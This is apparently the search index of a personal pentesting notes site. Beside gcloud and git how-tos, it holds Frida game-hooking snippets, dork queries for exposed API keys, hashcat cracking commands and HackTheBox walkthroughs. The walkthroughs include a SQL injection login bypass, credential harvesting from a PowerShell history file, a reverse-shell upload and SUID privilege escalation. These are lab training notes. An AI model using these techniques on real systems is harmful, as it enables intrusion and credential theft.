# Display active processes and installed applications\nfrida-ps -Ua\n\n# Restore class loaders\nJava.perform(function() {\n    var application = Java.use(\"android.com.application\");\n    var classloader;\n    application.attach.overload('android.content.Context').implementation = function(context) {\n        var result = this.attach(context);\n        classloader = context.getClassLoader();\n        Java.classFactory.loader = classloader;\n        return result;\n    }\n})\n\n# Enumerate classes loaded in memory\nJava.perform(function() {\n    Java.enumerateLoadedClasses\n    ({\n        \"onMatch\": function(className) {\n            console.log(className)\n        },\n        \"onComplete\": function(){}\n    })\n})\n\n# Enumerate classes loaded in memory linked to a specific <package>\nJava.enumerateLoadedClasses\n({\n    \"onMatch\": function(className) {\n        if(className.includes(\"<package>\")) {\n            console.log(className);\n        }\n    },\n    \"onComplete\": function(){}\n});\n\n# Android version installed on device\nJava.androidVersion\n\n# Execute a method of an Activity\nJava.choose(\"<Name and path of the activity>\", {\n    onMatch: function(instance) {\n        // This function will be called for every instance found by frida\n        console.log(\"Found instance: \" + instance);\n        instance.<Method name>();\n    },\n    onComplete: function(){}\n});\n\n# Save an Activity in a variable\nvar NameofVariable = Java.use(\"com.android.application.<nameOfActivity>\"); \n\n# Execute a js script from Frida\nfrida -U com.android.applicationName -l instance.js\n\n# Modify the implementation of a function\nvar activity = Java.use(\"com.droidhem.basketball.adapters.Game\");\nactivity.normalshoot.implementation = function(x,y){\n    // print a trace of the hooked call\n    console.log(\"Inside normalshoot\");\n    this.score.value += 10000;\n    // in the original code:\n    // this.score += 2;\n}\n
    ","tags":["mobile pentesting"]},{"location":"gcloud-cli/","title":"gcloud CLI","text":"
# Get a list of images \ngcloud compute images list \n\n# PROJECT=<PROJECT> # Replace this with your project id \n# ZONE=<zone>   # Replace this with a GCP zone of your choice \n\n# Launch a GCE instance \ngcloud compute instances create gcp-lab1 \\ \n --project=$PROJECT \\ \n --zone=$ZONE \\ \n --machine-type=f1-micro \\ \n --tags=http-server \\ \n --image=ubuntu-1804-bionic-v20190722a \\ \n --image-project=ubuntu-os-cloud \n\n# Get a list of instances\ngcloud compute instances list\n\n# Filter instances by zone \ngcloud compute instances list --zone=<zone>\n\n# SSH into the VM. This command creates the pair of keys and all ssh infrastructure needed for the connection\ngcloud compute ssh <instance> --zone=<zone-of-instance> \n\n# Open port 80 for HTTP access \ngcloud compute firewall-rules create default-allow-http \\ \n --project=$PROJECT \\ \n --direction=INGRESS \\ \n --action=ALLOW \\ \n --rules=tcp:80 \\ \n --source-ranges=0.0.0.0/0 \\ \n --target-tags=http-server \n\n# Run these commands within the VM \nsudo apt-get install -y apache2 \nsudo systemctl start apache2 \n\n# Access Apache through the public IP \n# Terminate the instance \ngcloud compute instances delete gcp-lab1 --zone $ZONE \n\n# Connect to Google Cloud SQL\ngcloud sql connect <nameOfDatabase>\n

### Add an image to GCP Container Registry

In the GCP Dashboard go to Container Registry. The first time it will be empty.

# Run the below commands in Google Cloud Shell \n\ngcloud services enable containerregistry.googleapis.com \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP Project ID \n\ndocker pull busybox \ndocker images \n
cat <<EOF >> Dockerfile \nFROM busybox:latest \nCMD [\"date\"] \nEOF \n
    # Build your own instance of busybox and name it mybusybox\ndocker build . -t mybusybox \n\n# Tag your image with the convention stated by GCP\ndocker tag mybusybox gcr.io/$PROJECT_ID/mybusybox:latest \n# When listing images with docker images, you will see it renamed.\n\n# Run your image\ndocker run gcr.io/$PROJECT_ID/mybusybox:latest \n
    # Associate gcp credentials with docker CLI  \ngcloud auth configure-docker \n\n# Take our mybusybox image available in the environment and pushes it to the Container Registry.\ndocker push gcr.io/$PROJECT_ID/mybusybox:latest \n
    ","tags":["cloud","google cloud platform","gcp"]},{"location":"gcloud-cli/#demo-of-anthos","title":"Demo of Anthos","text":"
# Run the below commands in the macOS Terminal \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP project ID \nexport REGION=<REGION ID> # Replace this with a valid GCP region \n\ngcloud config set project $PROJECT_ID \ngcloud config set compute/region $REGION \n\n# Enable APIs \ngcloud services enable \\ \n container.googleapis.com \\ \n gkeconnect.googleapis.com \\ \n gkehub.googleapis.com \\ \n cloudresourcemanager.googleapis.com \n\n# Launch GKE Cluster \ngcloud container clusters create cloud-cluster \\ \n    --machine-type=n1-standard-1 \\ \n    --num-nodes=1 \n\n# Launch Minikube. Refer to the docs at https://minikube.sigs.k8s.io/docs/  \nminikube start \n\n# Create GCP Service Account \ngcloud iam service-accounts create anthos-hub \n\n# Add IAM Role to Service Account \ngcloud projects add-iam-policy-binding $PROJECT_ID \\ \n --member=\"serviceAccount:anthos-hub@$PROJECT_ID.iam.gserviceaccount.com\" \\ \n --role=\"roles/gkehub.connect\" \n\n# Download the Service Account JSON Key \ngcloud iam service-accounts keys create \"./anthos-hub-svc.json\" \\ \n  --iam-account=\"anthos-hub@$PROJECT_ID.iam.gserviceaccount.com\" \\ \n  --project=$PROJECT_ID \n\n# Register cluster with Anthos \nURI=$(gcloud container clusters list --filter='name=cloud-cluster' --uri)\n\ngcloud container hub memberships register cloud-cluster \\ \n        --gke-uri=$URI \\ \n        --service-account-key-file=./anthos-hub-svc.json \n\n# List Membership \ngcloud container hub memberships list \n\n# Register Minikube with Anthos \ngcloud container hub memberships register local-cluster \\ \n --service-account-key-file=./anthos-hub-svc.json \\ \n --kubeconfig=~/.kube/config \\ \n --context=minikube \n\n# List Membership \ngcloud container hub memberships list \n\n# Create Kubernetes Role \n\nkubectl config use-context minikube \n
    cat <<EOF > cloud-console-reader.yaml \nkind: ClusterRole \napiVersion: rbac.authorization.k8s.io/v1 \nmetadata: \n  name: cloud-console-reader \nrules: \n- apiGroups: [\"\"] \n  resources: [\"nodes\", \"persistentvolumes\"] \n  verbs: [\"get\", \"list\", \"watch\"] \n- apiGroups: [\"storage.k8s.io\"] \n  resources: [\"storageclasses\"] \n  verbs: [\"get\", \"list\", \"watch\"] \nEOF \n
    kubectl apply -f cloud-console-reader.yaml \n\n# Create RoleBinding \nkubectl create serviceaccount local-cluster \n\nkubectl create clusterrolebinding local-cluster-anthos-view \\ \n --clusterrole view \\ \n --serviceaccount default:local-cluster \n\nkubectl create clusterrolebinding cloud-console-reader-binding \\ \n --clusterrole cloud-console-reader \\ \n --serviceaccount default:local-cluster \n\n# Get the Token \nSECRET_NAME=$(kubectl get serviceaccount local-cluster -o jsonpath='{$.secrets[0].name}') \n\n# Copy the secret and paste it in the console \nkubectl get secret ${SECRET_NAME} -o jsonpath='{$.data.token}' | base64 --decode  \n\n# Delete Membership \ngcloud container hub memberships delete cloud-cluster \ngcloud container hub memberships delete local-cluster \n\n# Clean up  \ngcloud container clusters delete cloud-cluster --project=${PROJECT_ID} \ngcloud iam service-accounts delete anthos-hub@${PROJECT_ID}.iam.gserviceaccount.com \nminikube delete \n
    ","tags":["cloud","google cloud platform","gcp"]},{"location":"git/","title":"Git - A version controller system for programming","text":"

Git is a distributed version control system that tracks changes in any set of computer files, usually used for coordinating work among programmers (Wikipedia).

    "},{"location":"git/#install","title":"Install","text":"

    From: https://git-scm.com/

    "},{"location":"git/#git-basic-commands","title":"Git basic commands","text":"

Go to your project folder and then initialize a repo with:

    git init\n

    Once you do that, you will see a .git folder in your project folder.

    "},{"location":"git/#git-status","title":"git status","text":"

This tells you what is not yet saved in the repository. These are the \"untracked\" files.

    git status\n
    "},{"location":"git/#git-add","title":"git add","text":"

    \"Git add\" add changed files/folders to the repository staging area of the branch. It tracks them. You can add a single file with:

    git add <file>\n

    You can also add a folder

    git add <folder>\n
    You can add all unstaged files with a dot:

    git add .\n
    "},{"location":"git/#git-rm-cached","title":"git rm --cached","text":"

You can unstage files from being committed:

    git rm --cached <file>\n
    "},{"location":"git/#git-commit","title":"git commit","text":"

    Commit the changes you have staged properly with:

    git commit -m \"message that describes what you have changed\"\n

    To undo the most recent commit we've made:

    git reset --soft HEAD~\n
    "},{"location":"git/#git-config","title":"git config","text":"

    To setup user name and user email:

    git config --global user.name \"NameOfUser\"\ngit config --global user.email \"email@email.com\"\n
    "},{"location":"git/#git-branch","title":"git branch","text":"

    To create a new branch:

    git branch <newBranchName>\n

    To list all existing branches:

    git branch\n

    To switch to a branch:

    git checkout <destinationBranch>\n

    To create a new branch and checkout into it in one command:

    git checkout -b <branchName>\n
    To delete a branch:

    git branch <branchName> -d\n

    If you want to force the deletion (maybe some changes are not staged), then:

    git branch <branchName> -D\n
    "},{"location":"git/#git-merge","title":"git merge","text":"

    Having two branches (main and newbranch), to merge changes contained in newbranch to main branch, go to main branch with \"git checkout main\" and merge the new branch with:

    git merge <newBranch>\n
    "},{"location":"git/#git-log","title":"git log","text":"

It displays all commits and their commit messages. Every commit has an associated id. You can use that id for reverting changes.

    git log\n
    "},{"location":"git/#git-revert","title":"git revert","text":"

    It allows us to revert back to a previous version of our project.

    git revert <commitId>\n
    "},{"location":"git/#gitignore","title":".gitignore","text":"

It's a configuration file that allows you to hide existing files and folders in your repository. Content listed there doesn't get pushed to a public repository. The file is called .gitignore and has one line per resource to be ignored, as in the sketch below.
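
A minimal sketch (these file names are just examples):

# One pattern per line\necho \".env\" >> .gitignore\necho \"node_modules/\" >> .gitignore\n\ngit add .gitignore\ngit commit -m \"Add .gitignore\"\n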

Also important: if a file was staged before, you will need to remove it from the cache...

    "},{"location":"git/#git-remove-cached","title":"git remove --cached","text":"

To untrack a cached file so it can be added to the .gitignore list:

git rm --cached <fileName>\n
    "},{"location":"git/#git-remote","title":"git remote","text":"

    To check out which remote repository our local repository is connected to:

    git remote\n

    To connect my local project folder to the github repo.

    git remote add origin https://github.com/username/reponame.git\n
    "},{"location":"git/#git-push","title":"git push","text":"

    To push our local changes into the connected github repo:

    git push -u origin main\n
Note: origin references the connection, and main is because we are in the main branch (that's what we are pushing). The first git push is a little different from future git pushes, since we'll need to use the -u flag in order to set origin as the default remote repository, so we won't have to provide its name every time.

    "},{"location":"git/#some-tricks","title":"Some tricks","text":""},{"location":"git/#counting-commits","title":"Counting commits","text":"

git rev-list --count HEAD\n
    If you want to specify a branch name:
    git rev-list --count <branch>\n

    "},{"location":"git/#backing-up-untracked-files","title":"Backing-up untracked files","text":"

Git, along with some Bash command piping, makes it easy to create a tar archive of your untracked files.

$ git ls-files --others --exclude-standard -z |\\\nxargs -0 tar rvf ~/backup-untracked.tar\n

    "},{"location":"git/#viewing-a-file-of-another-branch","title":"Viewing a file of another branch","text":"

    Sometimes you want to view the content of the file from another branch. It's possible with a simple Git command, and without actually switching your branch.

Suppose you have a file called README.md in the main branch, and you're working on a branch called dev. You can view the main version with git show main:README.md:

    git show <branchName>:<fileName>\n

    "},{"location":"git/#pentesting-git","title":"Pentesting git","text":"

    Source: https://thecyberpunker.com/tools/git-exposed-pentesting-git-tools/

    "},{"location":"git/#git-dumper","title":"git-dumper","text":"

    https://github.com/arthaud/git-dumper

    "},{"location":"github-dorks/","title":"Github Dorks","text":"

    Go to github.

Github Dorking Query Expected results applicationName api key After getting results, filter by issue and you may find some api keys. It's common to leave api keys exposed when rebasing a git repo, for instance api_key - authorization_bearer - oauth - auth - authentication - client_secret - api_token - client_id - OTP - HOMEBREW_GITHUB_API_TOKEN - SF_USERNAME - HEROKU_API_KEY - JEKYLL_GITHUB_TOKEN - api.forecast.io - password - user_password - user_pass - passcode - client_secret - secret - password hash - user auth - extension: json nasa Results show some extensions that include json, so they might be API related shodan_api_key Results show shodan api keys \"authorization: Bearer\" This search reveals some authorization tokens. filename: swagger.json Go to the Code tab and you will have the swagger file.","tags":["reconnaissance","scanning","osint","dorking"]},{"location":"gobuster/","title":"gobuster","text":"

Great tool to brute force directory discovery, but it's not recursive (you need to specify a directory to perform a deeper scan). Also, dictionaries are not API-specific. But here are some commands for Gobuster:

gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,404 -x .php,.txt -r \n# -b: exclude specific http response codes from the results\n# -r: follow redirects\n# -x: append these extensions to the paths provided by the dictionary\n
    "},{"location":"gobuster/#enumerate-subdomains","title":"Enumerate subdomains:","text":"

    From HackTheBox machine - Three:

    gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n
    "},{"location":"gobuster/#examples-from-real-life","title":"Examples from real life","text":"
    gobuster dir -u https://friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,php -t 20 -k\n\n# dir to search for directories\n# -t number of concurrent threads\n# -k to avoid error message about certificate: invalid certificate: x509: certificate has expired or is not yet valid\n# -x to indicate an extension for the file\n# -w to indicate a dictionary or wordlist\n\n\n\n# -l Display the length of the response\n# -s Show an especific status code\n# -r Follow redirect\n
    "},{"location":"google-dorks/","title":"Google Dorks","text":"

    Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using.

    This is an awesome database with more than 7K googledork entries: https://www.exploit-db.com/google-hacking-database.

Google Dorking Query Expected results intitle:\"api\" site: \"example.com\" Finds all publicly available API related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site: \"example.com\" intitle:\"json\" site: \"example.com\" Many APIs use json, so this might be a cool filter inurl:\"/wp-json/wp/v2/users\" Finds all publicly available WordPress API user directories. intitle:\"index.of\" intext:\"api.txt\" Finds publicly available API key files. inurl:\"/api/v1\" intext:\"index of /\" Finds potentially interesting API directories. intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool This is one of my favorite queries. It lists potentially exposed API keys. site:*.domain.com It enumerates subdomains for the given domain \"domain.com\" site:*.domain.com filetype:pdf sales It searches for pdf files named \"sales\" in all subdomains. cache:domain.com/page It will display the google.com cache of that page. inurl:passwd.txt It retrieves pages that contain that string in the url.","tags":["reconnaissance","scanning","osint","dorking"]},{"location":"gopherus/","title":"Gopherus - a tool for exploiting SSRF","text":"

This tool will help you to generate Gopher payloads for exploiting SSRF (Server Side Request Forgery) and gaining RCE (Remote Code Execution).

    ","tags":["pentesting","web","pentesting","ssrf"]},{"location":"gopherus/#installation","title":"Installation","text":"
git clone https://github.com/tarunkant/Gopherus.git\n\ncd Gopherus\nchmod +x install.sh\nsudo ./install.sh\n
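
A usage sketch, assuming the standard module names (mysql, fastcgi, redis, smtp...):

# Generate a gopher:// payload for a given backend service\ngopherus --exploit mysql\n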
    ","tags":["pentesting","web","pentesting","ssrf"]},{"location":"grep/","title":"grep","text":"

It filters output.

# -C: return 5 lines above and 5 lines below the line where the criteria is matched\ncat text.txt | grep -C 5 \"password\"\n
    ","tags":["pentesting","reconnaissance"]},{"location":"hashcat/","title":"Hashcat - A password recovery tool","text":"

    Hashcat is a password recovery tool. It had a proprietary code base until 2015, but was then released as open source software. Versions are available for Linux, OS X, and Windows. Wikipedia

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#installation","title":"Installation","text":"

    Download from: https://hashcat.net/hashcat/.

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#basic-commands","title":"Basic commands","text":"
    # Get help \nhashcat -help \n\n# To crack a hash with a dictionary\nhashcat -m 0 -a 0 -D2 example0.hash example.dict\n# -m:  to specify the module of the algorithm we\u2019ll be running. Then -m 0 specifies an MD5 type of hash\n# -a: type of attack. Then -a 0 is a dictionary attack\n# Results are stored in file hashcat.potfile\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#modules","title":"Modules","text":"

    One of the most difficult parts is setting the mode. See https://hashcat.net/wiki/doku.php?id=example_hashes.

    One common error is:

    Approaching final keyspace - workload adjusted.           \nSession..........: hashcat                                \nStatus...........: Exhausted\n

To fix this, you can use the flag '-w', which sets the workload profile (1 to 4, from lowest to highest). For example, -w 3 sets a high workload profile.
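
For example, the same dictionary attack as above with a higher workload profile:

hashcat -m 0 -a 0 -w 3 example0.hash example.dict\n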

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#rules","title":"Rules","text":"

    Located at: /usr/share/hashcat/rules/.

    You can create rules by creating a file called custom.rule and using these commands: https://hashcat.net/wiki/doku.php?id=rule_based_attack.
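
A minimal sketch of such a rule file (rule functions are documented at the link above):

# Each line is one mutation: capitalize the first letter and append \"!\"\necho 'c $!' > custom.rule\n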

    After that use the flag -r to be able to use the rule created:

hashcat -m 0 -a 0 -D2 example0.hash example.dict -r rules/custom.rule\n\n# By pressing the s key during execution you can check the status at any time\ns\n

    Generate a mutate password list based on a custom.rule:

    hashcat --force password.list -r custom.rule --stdout > mutated_password.list\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mask-attacks","title":"Mask attacks","text":"

    These are the possible masks that you can use:

?l = abcdefghijklmnopqrstuvwxyz\n?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ\n?d = 0123456789\n?h = 0123456789abcdef\n?H = 0123456789ABCDEF\n?s = \u00abspace\u00bb!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\n?a = ?l?u?d?s\n?b = 0x00 - 0xff\n\n# Note: the following are rule functions (for .rule files), not mask charsets:\nc = Capitalize the first letter and lowercase others\nsXY = Replace all instances of X with Y\n$! = Add the exclamation character at the end\n

Hashcat will apply the rules of custom.rule to each word in password.list and store the mutated versions in our mutated_password.list accordingly.

    Example of a mask attack:

hashcat -m 0 -a 3 example0.hash ?l?l?l?l?l?l?l?l?a  \n# the first 8 characters will be lowercase letters and the ninth one will be from the all-character pool\n

    Hashcat and John come with pre-built rule lists that we can use for our password generating and cracking purposes. One of the most used rules is best64.rule

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#cracking-password-of-microsoft-word-file","title":"Cracking Password of Microsoft Word file","text":"
cd /root/Desktop/\n/usr/share/john/office2john.py MS_Word_Document.docx > hash\n\ncat hash\n\nMS_Word_Document.docx:$office$*2013*100000*256*16*ff2563844faca58a12fc42c5036f9cf8*ffaf52db903dbcb6ac2db4bab6d343ab*c237403ec97e5f68b7be3324a8633c9ff95e0bb44b1efcf798c70271a54336a2\n\n# Remove the first part (the file name). The hash would be:\n$office$*2013*100000*256*16*ff2563844faca58a12fc42c5036f9cf8*ffaf52db903dbcb6ac2db4bab6d343ab*c237403ec97e5f68b7be3324a8633c9ff95e0bb44b1efcf798c70271a54336a2\n\nhashcat -a 0 -m 9600 --status hash /root/Desktop/wordlists/1000000-password-seclists.txt --force\n# -a 0: dictionary mode\n# -m 9600: Set method to MS Office 2013\n# --status : Enable automatic update of the status screen\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#resources","title":"Resources","text":"

    Examples: cracking common hashes: https://infosecwriteups.com/cracking-hashes-with-hashcat-2b21c01c18ec.

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#modules-cheatsheet","title":"Modules cheatsheet","text":"

    https://hashcat.net/wiki/doku.php?id=example_hashes

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mode-7300-ipmi","title":"mode 7300: IPMI","text":"

    For cracking hashes from IPMI service: In the event of an HP iLO using a factory default password, we can use this Hashcat mask attack command

    hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#module-5600","title":"Module 5600","text":"

    All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

    hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mode-1800-unshadow-file","title":"Mode 1800: unshadow file","text":"
    hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"how-to-resolve-run-of-the-mill-connection-problems/","title":"How to resolve run-of-the-mill connection problems","text":"
# Check connection\nping 8.8.8.8\n\n# Check domain resolution\nping google.com\n\n# If pinging 8.8.8.8 works but pinging google.com doesn't, check the DNS resolver file\n    # Add a new line: \n    # nameserver 8.8.8.8\nsudo nano /etc/resolv.conf\n\n# Check wired connections\nsudo service networking status\n
    ","tags":["dns","ping","connection problems"]},{"location":"how-to-resolve-run-of-the-mill-connection-problems/#prevent-etcresolvconf-from-updating","title":"Prevent /etc/resolv.conf from updating","text":"

    By default, NetworkManager dynamically updates the\u00a0/etc/resolv.conf\u00a0file with the DNS settings from active NetworkManager connection profiles. However, you can disable this behavior and manually configure DNS settings in\u00a0/etc/resolv.conf. Steps:

    1. As the root user, create the\u00a0/etc/NetworkManager/conf.d/90-dns-none.conf\u00a0file with the following content by using a text editor:

    [main]\ndns=none\n

    2. Reload the\u00a0NetworkManager\u00a0service:

    systemctl reload NetworkManager\n

    After you reload the service, NetworkManager no longer updates the\u00a0/etc/resolv.conf\u00a0file. However, the last contents of the file are preserved.

    3. Optionally, remove the\u00a0\"Generated by NetworkManager\" comment from\u00a0/etc/resolv.conf\u00a0to avoid confusion.

    Verification

    1. Edit the /etc/resolv.conf file and manually update the configuration.

    2. Reload the NetworkManager service:

    systemctl reload NetworkManager\n

    3. Display the /etc/resolv.conf file:

    cat /etc/resolv.conf\n

    If you successfully disabled DNS processing, NetworkManager did not override the manually configured settings.

    ","tags":["dns","ping","connection problems"]},{"location":"htb-appointment/","title":"Appointment - A HackTheBox machine","text":"
    nmap -sC -A $ip -Pn\n

    Only port 80 is open.

    It's a login panel with an SQL injection vulnerability.

    To get in, enter this in the username field: 1' OR '1'='1';#
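
    Why that works (a sketch, with made-up table and column names, assuming a typical back-end login query): the injected quote closes the username string, OR '1'='1' makes the WHERE clause always true, and ;# cuts off the rest of the statement, password check included.

    SELECT * FROM users WHERE username = '1' OR '1'='1';# ' AND password = '...'\n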

    ","tags":["walkthrough"]},{"location":"htb-archetype/","title":"Archetype - A Hack the Box machine","text":"
    nmap  -sC -sV $ip -Pn\n

    Open ports: 135, 139, 445, 1433.

    First, exploit port 445. With smbclient, you can download the file prod.dtsConfig, which contains credentials for the MSSQL database.
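
    A sketch of that download step (the share name backups is an assumption from memory, not confirmed in these notes):

    smbclient -N -L \\\\\\\\$ip\nsmbclient -N \\\\\\\\$ip\\\\backups\n# then, at the smb: prompt\nget prod.dtsConfig\n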

    With those credentials you can follow the instructions from this impacket module, and the steps after it, to exploit the service and get a reverse shell with nc64.exe.

    With that, you will get user.txt in Desktop.

    For escalation of privileges, see technique Recently accessed files and executed commands.

    type C:\\Users\\sql_svc\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\n

    With admin credentials, you can use impacket's psexec.py module to get an interactive shell on the Windows host with admin rights.

    python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\\!\\!@10.129.95.187\n
    ","tags":["walkthrough"]},{"location":"htb-bank/","title":"Bank - A HackTheBox machine","text":"

    The entire exploitation of this machine depends on:

    • reconnaissance phase: being able to determine that some \"dns digging\" or /etc/hosts changes must be done. There is also some guessing: you need to assume that bank.htb is a valid domain for a DNS zone transfer... mmm, weird.
    • enumeration phase: using the right wordlist to locate a data breach containing a password for access.

    Later on, other skills come in handy, such as reading comments in source code.

    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#users-flag","title":"User's flag","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#reconnaisance","title":"Reconnaisance","text":"
    nmap -sV -sC -Pn  -p-\n

    Results:

    PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 08eed030d545e459db4d54a8dc5cef15 (DSA)\n|   2048 b8e015482d0df0f17333b78164084a91 (RSA)\n|   256 a04c94d17b6ea8fd07fe11eb88d51665 (ECDSA)\n|_  256 2d794430c8bb5e8f07cf5b72efa16d67 (ED25519)\n53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu\n80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))\n| http-title: HTB Bank - Login\n|_Requested resource was login.php\n|_http-server-header: Apache/2.4.7 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

    Let's check UDP connections to port 53:

    sudo nmap -sU -sC -sV -Pn 10.129.29.200 -p53\n

    Results:

    PORT   STATE SERVICE VERSION\n53/udp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

    Open the browser and examine http://10.129.29.200; it shows an Apache web server banner.

    Since the DNS server is running on port 53 TCP/UDP, we can attempt a zone transfer. However, it is worth noting that guessing bank.htb as a valid zone for this transfer is not a very realistic or scientific approach to penetration testing. Nevertheless, since this is HackTheBox and we are playing this game, let's allow ourselves to go with the flow.

    Go here for \"digging more into DNS transfer zones\".

    dig axfr bank.htb @10.129.29.200\n

    Results:

    ; <<>> DiG 9.18.12-1-Debian <<>> axfr bank.htb @10.129.29.200\n;; global options: +cmd\nbank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800\nbank.htb.               604800  IN      NS      ns.bank.htb.\nbank.htb.               604800  IN      A       10.129.29.200\nns.bank.htb.            604800  IN      A       10.129.29.200\nwww.bank.htb.           604800  IN      CNAME   bank.htb.\nbank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800\n

    Add those results to /etc/hosts:

    echo \"10.129.29.200   bank.htb chris.bank.htb ns.bank.htb www.bank.htb\" | sudo tee -a /etc/hosts \n
    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#enumeration","title":"Enumeration","text":"
    whatweb http://bank.htb\n

    Results:

    http://bank.htb [302 Found] Apache[2.4.7], Bootstrap, Cookies[HTBBankAuth], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.129.29.200], JQuery, PHP[5.5.9-1ubuntu4.21], RedirectLocation[login.php], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.21]                                                                                                       \nhttp://bank.htb/login.php [200 OK] Apache[2.4.7], Bootstrap, Cookies[HTBBankAuth], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.129.29.200], JQuery, PHP[5.5.9-1ubuntu4.21], PasswordField[inputPassword], Script, Title[HTB Bank - Login], X-Powered-By[PHP/5.5.9-1ubuntu4.21]\n

    After browsing the site, reading the source code and trying some SQL injections, let's do some more enumeration.

    gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \n

    Results:

    /uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]\n/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]\n/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]\n/server-status        (Status: 403) [Size: 288]\n/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]\n

    We have a data breach under http://bank.htb/balance-transfer/

    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#exploitation","title":"Exploitation","text":"

    Browsing that exposed URL, we can sort the listing by file size. That is a quick way to spot the file containing the credentials (it has a different size from the others). Again, this is HackTheBox and not reality: in the real world you would probably download all the files as quietly as possible for offline processing.
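
    In that scenario, a sketch of the quiet bulk download (directory listing is enabled, so wget can mirror the folder):

    wget -q -r -np -nH http://bank.htb/balance-transfer/\n# -r: recursive, -np: don't ascend to the parent, -nH: don't create a hostname directory\n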

    But this is HackTheBox and we have credentials to proceed to the next step. Log into the dashboard at http://bank.htb/login.php:

    --ERR ENCRYPT FAILED\n+=================+\n| HTB Bank Report |\n+=================+\n\n===UserAccount===\nFull Name: Christos Christopoulos\nEmail: chris@bank.htb\nPassword: !##HTBB4nkP4ssw0rd!##\nCreditCards: 5\nTransactions: 39\nBalance: 8842803 .\n===UserAccount===\n

    Browsing around a little, and reading source code, you can easily find a valuable debug comment:

    With this, I just renamed my pentesmonkey file to the .htb extension and uploaded it. Under the \"Attachment\" column in the dashboard, you have the link to the uploaded file.

    Start a netcat listener:

    nc -lnvp 1234\n

    In my case, I clicked on http://bank.htb/uploads/pentesmonkey.htb and got a reverse shell.

    Cat the user.txt

    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#flag-roottxt","title":"Flag root.txt","text":"

    After some basic reconnaissance, I run:

    find / -perm /4000 2>/dev/null\n

    And results:

    /var/htb/bin/emergency\n/usr/lib/eject/dmcrypt-get-device\n/usr/lib/openssh/ssh-keysign\n/usr/lib/dbus-1.0/dbus-daemon-launch-helper\n/usr/lib/policykit-1/polkit-agent-helper-1\n...\n

    /var/htb/bin/emergency catches our attention immediately. Running strings on it shows that it contains a \"/bin/bash\" command. After solving this machine, I read this writeup and got some insights into investigating an ELF file beyond running strings: in that writeup, an md5sum of the binary is taken, and googling the hash reveals that this ELF file is in reality a dash shell.
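
    The corresponding inspection, for reference (a sketch):

    file /var/htb/bin/emergency\nstrings /var/htb/bin/emergency | head\nmd5sum /var/htb/bin/emergency   # google the resulting hash\n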

    Nice. Run the binary and you are root.

    /var/htb/bin/emergency\n
    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-base/","title":"Base - A Hack The Box machine","text":"

    Enumerate open ports and services.

    nmap -sC -sV $ip -Pn\n

    Ports 22 and 80 are open.

    Add base.htb to /etc/hosts.

    Enumerate directories:

